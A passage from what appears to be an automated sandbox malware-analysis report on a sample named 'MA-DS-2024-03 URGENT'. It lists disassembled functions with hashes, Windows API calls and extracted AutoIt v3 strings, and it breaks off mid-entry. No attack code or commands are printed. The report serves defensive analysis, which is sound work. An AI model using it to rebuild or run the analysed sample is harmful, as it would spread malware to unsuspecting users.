                                                        • Instruction Fuzzy Hash: 5A6160736197818FC32CCE2CC89145ABBE2EEA521474C8F6DD4D687792D670FA09C792
                                                        Function 01677F80 Relevance: .2, Instructions: 186COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d2140795fccf966c202d8ad353feab17fa13c13d27816701a84753ceaf78d386
                                                        • Instruction ID: 9eab7ab152016ba9e5b6bc52e39671debc77630078d5ebc077b5d5eb1c307e1b
                                                        • Opcode Fuzzy Hash: d2140795fccf966c202d8ad353feab17fa13c13d27816701a84753ceaf78d386
                                                        • Instruction Fuzzy Hash: DE6143359287A44BC326AE3DEC8127AB394FFD6385F54C73EEA81B3A81DB3411568344
                                                        Function 0056C594 Relevance: .1, Instructions: 134COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ab2fee5558319bb7b77599fdacabd9ee24db5531fb8add38223017fc8891590f
                                                        • Instruction ID: 9ca45030816374493ad504bef7778a68cc74dc5459e378cd5d504e344b198e9f
                                                        • Opcode Fuzzy Hash: ab2fee5558319bb7b77599fdacabd9ee24db5531fb8add38223017fc8891590f
                                                        • Instruction Fuzzy Hash: 4C314A32A063845BCF328A6DDC146B57F64BB77775F1D51A7E4C28B192C221AC40C669
                                                        Function 01677B71 Relevance: .1, Instructions: 123COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 19afe5fe0d0437fd764e1ef0c79a7b9e67cff575662f2ab8d855ef149d638f7d
                                                        • Instruction ID: 385d6eae5b6e559a559add8341a0c0a22276280781783dd85aa9a296bcd2d7dd
                                                        • Opcode Fuzzy Hash: 19afe5fe0d0437fd764e1ef0c79a7b9e67cff575662f2ab8d855ef149d638f7d
                                                        • Instruction Fuzzy Hash: 7041C1306083558FC729EE69E8E467BB3D1FBC9316F25893ED68283381CB386415CB61
                                                        Function 016A3780 Relevance: .1, Instructions: 105COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b33081dabc7f6469ce34c37c8165833aea82e5abc41e973800425e6ee7c24666
                                                        • Instruction ID: 1f93681bd071c9b310666e60ae9e723361838b6add535ed4ccf0dafbb0d06587
                                                        • Opcode Fuzzy Hash: b33081dabc7f6469ce34c37c8165833aea82e5abc41e973800425e6ee7c24666
                                                        • Instruction Fuzzy Hash: 1E4170756183019F8348CF69C58091AFBE2BFCC318F25896EE8999B311D735E942CF92
                                                        Function 016AD580 Relevance: .1, Instructions: 100COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c76a15beeee963c4f84a445264956e8a3ca97236d94a4da0cbf7fb091b069d5c
                                                        • Instruction ID: b5869b5d75bce0de78fe886a00a9b2f8a43124a0caffc1323e520ea091567c1b
                                                        • Opcode Fuzzy Hash: c76a15beeee963c4f84a445264956e8a3ca97236d94a4da0cbf7fb091b069d5c
                                                        • Instruction Fuzzy Hash: 4441AF456DE1C21EEB0B0B7190762E2EFF16CAF0487AEAAD9C0D80E203C503C587DB94
                                                        Function 00B665E8 Relevance: .1, Instructions: 92COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287269734.0000000000B62000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B62000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b62000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                        • Instruction ID: 4bb0198e74f525e775bfe6f50c899dd862d25835186520150b0a0a9232e138c3
                                                        • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                        • Instruction Fuzzy Hash: F741C271D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D734AB41DB80
                                                        Function 00B66478 Relevance: .0, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287269734.0000000000B62000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B62000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b62000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                        • Instruction ID: 253b34d58c336bca19e22ec6265efad7029e42a2b0c96e6c0d0cbd4e0cb5b8dc
                                                        • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                        • Instruction Fuzzy Hash: 89019D78A01209EFCB48DF99C5909AEF7F5FB98310F2085D9E819A7705DB34AE41DB80
                                                        Function 00B664D8 Relevance: .0, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287269734.0000000000B62000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B62000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b62000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                        • Instruction ID: d803e56ca556341a0aadd47ca90843393cc76f1d96ec762b0c78935acb44b066
                                                        • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                        • Instruction Fuzzy Hash: 1C019278A00209EFCB44DF98C5919AEF7F5FB58310F2085D9E80AA7705D734AE51DB80
                                                        Function 00B64E38 Relevance: .0, Instructions: 6COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287269734.0000000000B62000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B62000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b62000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                        • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                        • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                        • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                        Function 01671130 Relevance: .0, Instructions: 2COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                        • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                        • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                        • Instruction Fuzzy Hash:
                                                        Function 0048356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?,0048F910), ref: 00483627
                                                        • IsWindowVisible.USER32(?), ref: 0048364B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpperVisibleWindow
                                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                        • API String ID: 4105515805-45149045
                                                        • Opcode ID: fed52f404a64f80c9a9dc2c1c4167444291c9d1648bc4a49fe8c5b5d29b77391
                                                        • Instruction ID: 9f5fdaa8788cae778637d634d7abea83d78ef325d3b9343814b8d9d38e530adb
                                                        • Opcode Fuzzy Hash: fed52f404a64f80c9a9dc2c1c4167444291c9d1648bc4a49fe8c5b5d29b77391
                                                        • Instruction Fuzzy Hash: 28D19E702042009BCA04FF11C451A6E77E5AF55759F54886EF8826B3A3DB3DEE0ACB5A
                                                        Function 0048A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetTextColor.GDI32(?,00000000), ref: 0048A630
                                                        • GetSysColorBrush.USER32(0000000F), ref: 0048A661
                                                        • GetSysColor.USER32(0000000F), ref: 0048A66D
                                                        • SetBkColor.GDI32(?,000000FF), ref: 0048A687
                                                        • SelectObject.GDI32(?,00000000), ref: 0048A696
                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0048A6C1
                                                        • GetSysColor.USER32(00000010), ref: 0048A6C9
                                                        • CreateSolidBrush.GDI32(00000000), ref: 0048A6D0
                                                        • FrameRect.USER32(?,?,00000000), ref: 0048A6DF
                                                        • DeleteObject.GDI32(00000000), ref: 0048A6E6
                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 0048A731
                                                        • FillRect.USER32(?,?,00000000), ref: 0048A763
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0048A78E
                                                          • Part of subcall function 0048A8CA: GetSysColor.USER32(00000012), ref: 0048A903
                                                          • Part of subcall function 0048A8CA: SetTextColor.GDI32(?,?), ref: 0048A907
                                                          • Part of subcall function 0048A8CA: GetSysColorBrush.USER32(0000000F), ref: 0048A91D
                                                          • Part of subcall function 0048A8CA: GetSysColor.USER32(0000000F), ref: 0048A928
                                                          • Part of subcall function 0048A8CA: GetSysColor.USER32(00000011), ref: 0048A945
                                                          • Part of subcall function 0048A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
                                                          • Part of subcall function 0048A8CA: SelectObject.GDI32(?,00000000), ref: 0048A964
                                                          • Part of subcall function 0048A8CA: SetBkColor.GDI32(?,00000000), ref: 0048A96D
                                                          • Part of subcall function 0048A8CA: SelectObject.GDI32(?,?), ref: 0048A97A
                                                          • Part of subcall function 0048A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
                                                          • Part of subcall function 0048A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
                                                          • Part of subcall function 0048A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
                                                          • Part of subcall function 0048A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                        • String ID:
                                                        • API String ID: 3521893082-0
                                                        • Opcode ID: 7e5f0819146bb3c495cfb567e5aa3783eeba3ae5088b840f990f8bc64d3ce610
                                                        • Instruction ID: fb34620bd59db4fe0d00bba54468f49f6ea6f7247eb536f08ce7ecc3d6e9d283
                                                        • Opcode Fuzzy Hash: 7e5f0819146bb3c495cfb567e5aa3783eeba3ae5088b840f990f8bc64d3ce610
                                                        • Instruction Fuzzy Hash: 5E917D72408301BFD710AF64DC08A5F7BA9FB89321F100F2EF962961A1D774D949CB5A
                                                        Function 00402C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DestroyWindow.USER32(?,?,?), ref: 00402CA2
                                                        • DeleteObject.GDI32(00000000), ref: 00402CE8
                                                        • DeleteObject.GDI32(00000000), ref: 00402CF3
                                                        • DestroyIcon.USER32(00000000,?,?,?), ref: 00402CFE
                                                        • DestroyWindow.USER32(00000000,?,?,?), ref: 00402D09
                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 0043C43B
                                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0043C474
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0043C89D
                                                          • Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A
                                                        • SendMessageW.USER32(?,00001053), ref: 0043C8DA
                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0043C8F1
                                                        • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043C907
                                                        • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043C912
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                        • String ID: 0
                                                        • API String ID: 464785882-4108050209
                                                        • Opcode ID: 4375e54c2866febaad8ffc9ac244cdd1ac029a08f3163fb11202e14e0822a081
                                                        • Instruction ID: 2a922f2165ff82378a3b73503dcd1cf133edd61f128b8a365017e979e5fddc8b
                                                        • Opcode Fuzzy Hash: 4375e54c2866febaad8ffc9ac244cdd1ac029a08f3163fb11202e14e0822a081
                                                        • Instruction Fuzzy Hash: E112BF30604211EFDB15DF24C988BAAB7E1BF08304F54557EE855EB2A2C779E842CF99
                                                        Function 004774AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DestroyWindow.USER32(00000000), ref: 004774DE
                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047759D
                                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004775DB
                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 004775ED
                                                        • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00477633
                                                        • GetClientRect.USER32(00000000,?), ref: 0047763F
                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00477683
                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00477692
                                                        • GetStockObject.GDI32(00000011), ref: 004776A2
                                                        • SelectObject.GDI32(00000000,00000000), ref: 004776A6
                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 004776B6
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004776BF
                                                        • DeleteDC.GDI32(00000000), ref: 004776C8
                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004776F4
                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 0047770B
                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00477746
                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0047775A
                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 0047776B
                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0047779B
                                                        • GetStockObject.GDI32(00000011), ref: 004777A6
                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 004777B1
                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 004777BB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                        • API String ID: 2910397461-517079104
                                                        • Opcode ID: 39130e6e25830354a62f75781cb40fd4e4f8378a991d7811c774434fd18091c6
                                                        • Instruction ID: a65668349d9d90c20bc2e89cb33f711f17b366ce89c6f6fccfd6c75f405f0b1e
                                                        • Opcode Fuzzy Hash: 39130e6e25830354a62f75781cb40fd4e4f8378a991d7811c774434fd18091c6
                                                        • Instruction Fuzzy Hash: C2A18371A00605BFEB14DBA4DC49FAE7BB9EB04714F008129FA14A72E1C774AD44CB68
                                                        Function 0046AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0046AD1E
                                                        • GetDriveTypeW.KERNEL32(?,0048FAC0,?,\\.\,0048F910), ref: 0046ADFB
                                                        • SetErrorMode.KERNEL32(00000000,0048FAC0,?,\\.\,0048F910), ref: 0046AF59
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$DriveType
                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                        • API String ID: 2907320926-4222207086
                                                        • Opcode ID: d4d08640f91872c216ba8f74001c93904258f000dd65fb750c1087d08048f0fa
                                                        • Instruction ID: e912c7b3330773d5b9bf2588ba7fbd63f6bfe130c5f6eb3342ce3002eb002758
                                                        • Opcode Fuzzy Hash: d4d08640f91872c216ba8f74001c93904258f000dd65fb750c1087d08048f0fa
                                                        • Instruction Fuzzy Hash: 2E5186B0648A059ACB04DB61C942DBE73A5EF48708730446FF406B7291EA3DAD62DF5F
                                                        Function 004068DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: __wcsnicmp
                                                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                        • API String ID: 1038674560-86951937
                                                        • Opcode ID: ce0f0248606af78ccd81055a81288a9bc3f997fd33c224b6d577db6a67c2b9cd
                                                        • Instruction ID: cb422ad940ebd99c4cbaeb9a9904d1c86e4c1b178c3cf2ebe63a60ccd5d4c750
                                                        • Opcode Fuzzy Hash: ce0f0248606af78ccd81055a81288a9bc3f997fd33c224b6d577db6a67c2b9cd
                                                        • Instruction Fuzzy Hash: 3281E3B07002156ADF10BA62EC42FAB3768AF15704F14403BF9067A1C2EB7CDA55C66D
                                                        Function 0048A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSysColor.USER32(00000012), ref: 0048A903
                                                        • SetTextColor.GDI32(?,?), ref: 0048A907
                                                        • GetSysColorBrush.USER32(0000000F), ref: 0048A91D
                                                        • GetSysColor.USER32(0000000F), ref: 0048A928
                                                        • CreateSolidBrush.GDI32(?), ref: 0048A92D
                                                        • GetSysColor.USER32(00000011), ref: 0048A945
                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
                                                        • SelectObject.GDI32(?,00000000), ref: 0048A964
                                                        • SetBkColor.GDI32(?,00000000), ref: 0048A96D
                                                        • SelectObject.GDI32(?,?), ref: 0048A97A
                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED
                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0048AA14
                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 0048AA32
                                                        • DrawFocusRect.USER32(?,?), ref: 0048AA3D
                                                        • GetSysColor.USER32(00000011), ref: 0048AA4B
                                                        • SetTextColor.GDI32(?,00000000), ref: 0048AA53
                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0048AA67
                                                        • SelectObject.GDI32(?,0048A5FA), ref: 0048AA7E
                                                        • DeleteObject.GDI32(?), ref: 0048AA89
                                                        • SelectObject.GDI32(?,?), ref: 0048AA8F
                                                        • DeleteObject.GDI32(?), ref: 0048AA94
                                                        • SetTextColor.GDI32(?,?), ref: 0048AA9A
                                                        • SetBkColor.GDI32(?,?), ref: 0048AAA4
                                                        Memory Dump Source
